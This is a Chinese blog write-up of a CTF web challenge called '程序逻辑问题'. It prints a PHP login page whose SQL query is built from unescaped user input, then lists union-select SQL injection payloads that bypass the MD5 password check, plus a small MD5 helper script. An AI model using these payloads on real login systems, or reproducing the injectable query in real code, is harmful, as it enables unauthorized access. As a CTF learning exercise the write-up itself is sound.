实验吧-web-程序逻辑问题

最新推荐文章于 2019-07-16 20:50:58 发布
最新推荐文章于 2019-07-16 20:50:58 发布
阅读量352 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41173457/article/details/82183428
版权

源代码index.txt
发现源码

<html>
<head>
welcome to simplexue
</head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
    $conn = mysql_connect("********, "*****", "********");
    mysql_select_db("phpformysql") or die("Could not select database");
    if ($conn->connect_error) {
        die("Connection failed: " . mysql_error($conn));
} 
$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
    printf("Error: %s\n", mysql_error($conn));
    exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];

  if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
    echo "<p>Logged in! Key:************** </p>";
}
else {
    echo("<p>Log in failure!</p>");

  }


}

?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.txt">
</html>

代码审计
然后可以得出两个payload:
user=’ union select md5(9)#&pass=9
user=’ union select md5(‘x’)#&pass=x
user=admin’ and 0=1 union select md5(1)#&pass=1
user=admin’ and 0=1 union select ‘202cb962ac59075b964b07152d234b70’#&pass=123
user=admin’ and 0=1 union select ‘0dfb2d09aeef6a0220a25c2e2d0fddbd’#&pass=numa
附个脚本

import hashlib
aa='numa'
bb=hashlib.md5()
bb.update(aa.encode('utf-8'))
print(bb.hexdigest())
woy66
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
combine-reducers-london-web-102819
05-31
然而,正如您将看到的,当处理多个资源时,将所有这些逻辑放在一个 reducer 函数中会很快变得笨拙。 输入combineReducers()以节省时间! 在这个实验中,我们将看到Redux的combineReducers()函数如何让我们将不同的...
程序逻辑问题--实验
Gunther的博客
09-01 5005
程序逻辑问题 题目提示是绕过,本题考点:sql语句注入 <?php if($_POST[user] && $_POST[pass]) { $conn = mysql_connect("********, "*****", "********"); mysql_select_db("phpformysql") or die("Could not select database
实验吧-程序逻辑问题writeup
一个安全研究员
08-27 9437
1.      程序逻辑问题   题目提示是程序逻辑问题,那一定涉及到源码审计嘛,F12查看网页源代码:       这儿不就藏着源码吗,构造URL访问index.txt的如下源码: &lt;html&gt; &lt;head&gt; welcome to simplexue &lt;/head&gt; &lt;body&gt; &lt;?php     if($_P...
决斗场 - 实验WEB 程序逻辑问题
RaAlGhul的博客
12-21 595
题目链接:http://www.shiyanbar.com/ctf/62 点开题目链接,发现是一个类似于登陆的界面: 首先以之前的一道题:登陆一下好吗??的思路,猜测后台代码为: select * from user where username='str' and password='pastr' 我们在username和password上都输入 a'='
实验吧-程序逻辑问题
苟有恒,必有三更眠,五更起。
08-09 216
程序逻辑问题 原题链接 分析 查看源码有个index.txt &lt;?php if($_POST[user] &amp;&amp; $_POST[pass]) { $conn = mysql_connect("********, "*****", "********"); mysql_select_db("phpformysql") ...
实验吧——WEB-程序逻辑问题
迷风小白
04-12 2770
程序逻辑问题 直接查看网页源代码 <html> <head> welcome to simplexue </head> <body> <br /> <b>Notice</b>: Use of undefined constant user - assumed 'user' in <b>C:\h43a...
combine-reducers-nyc-web-120919
03-21
但是,正如您将看到的,当使用多个资源时,将所有这些逻辑放在一个reducer函数中很快会变得很笨拙。 输入combineReducers()保存一天!在本实验中,我们将看到Redux的combineReducers()函数如何使我们将不同的状态...
combine-reducers-denver-web-033020
03-21
但是,正如您将看到的,当使用多个资源时,将所有这些逻辑放在一个reducer函数中很快会变得很笨拙。输入combineReducers()保存一天!在本实验中,我们将看到Redux的combineReducers()函数如何使我们将不同的状态委派...
combine-reducers-atlanta-web-career-012819
05-31
然而,正如您将看到的,当处理多个资源时,将所有这些逻辑放在一个 reducer 函数中会很快变得笨拙。 输入combineReducers()以节省时间! 在这个实验中,我们将看到Redux的combineReducers()函数如何让我们将不同的...
combine-reducers-seattle-web-career-031119
05-31
然而,正如您将看到的,当处理多个资源时,将所有这些逻辑放在一个 reducer 函数中会很快变得笨拙。 输入combineReducers()以节省时间! 在这个实验中,我们将看到Redux的combineReducers()函数如何让我们将不同的...
实验吧--程序逻辑问题
weixin_43803070的博客
07-16 178
看了一下实验吧的题,说是程序逻辑问题,一开始没找到源码,打开源码之后审计: <html> <head> welcome to simplexue </head> <body> <?php if($_POST[user] && $_POST[pass]) { $conn = mysql_connect("********, ...
程序逻辑问题CTF
qq_22192367的博客
03-19 732
题目链接:http://ctf5.shiyanbar.com/web/5/index.php 有提示是绕过,打开题目,可以看到是个登陆问题,尝试抓包修改source值没什么效果 于是尝试查看源代码发现index.txt链接,打开发现是php后台代码,看来是个代码审计问题 代码大意:判断输入是否为空;将pass值进行md5加密后赋给pass变量;从php数据库中查询user用户的p...
CTF实验吧-WEB专题-5
qq_18661257的专栏
12-22 6011
1.上传绕过 题解 题目说是绕过,那就绕过吧,发现,上传除了php文件外会报需要传php文件,而传php文件则会报必须上传.jpg这些图片文件,那就从上传漏洞开始吧,一般常见的上传漏洞就是截断了,是0x00数据会截断后续数据,当数据为abc.php0x001.jpg时,服务器会处理为abc.php,而0x00后的数据会忽略(产生原因magic_quotes_gpc未打开,同时相关数据没有进行处理
实验吧-天网管理系统【php弱类型==与===的利用】
Sp4rkW的博客
08-07 4237
首先打开网页,查看源代码: 很明显有一行备注是给我们看的, &lt;!-- $test=$_GET['username']; $test=md5($test); if($test=='0') --&gt; 这很明显是个php弱类型问题,md5加密等于0,详情见我的博客【php弱口令总结】略过 将username替换之后bp可得如下代码: 很明显,这是告诉我们去访问一个新...
实验CTF刷题记录(web篇)
sinat_21923549的博客
03-10 8665
1.这个看起来有点简单 解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1 手工检测是否存在sql注入 使用sqlmap爆出当前数据库my_db 发现可能藏有key值的thiskey表 进一步爆出字段k0y并得到key值。 2.程序员的问题 解题链接: http://ctf5.shiyanbar.com/web/4/index
Web程序开发实验MVC模式实验原理分析
最新发布
06-11
Web程序开发中,MVC模式可以通过以下方式实现: 1. 模型(Model):模型是应用程序中处理数据的部分,它通常包含数据访问对象和业务逻辑。在Web应用程序中,模型通常以数据库或其他数据存储方式为基础,可以使用ORM...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值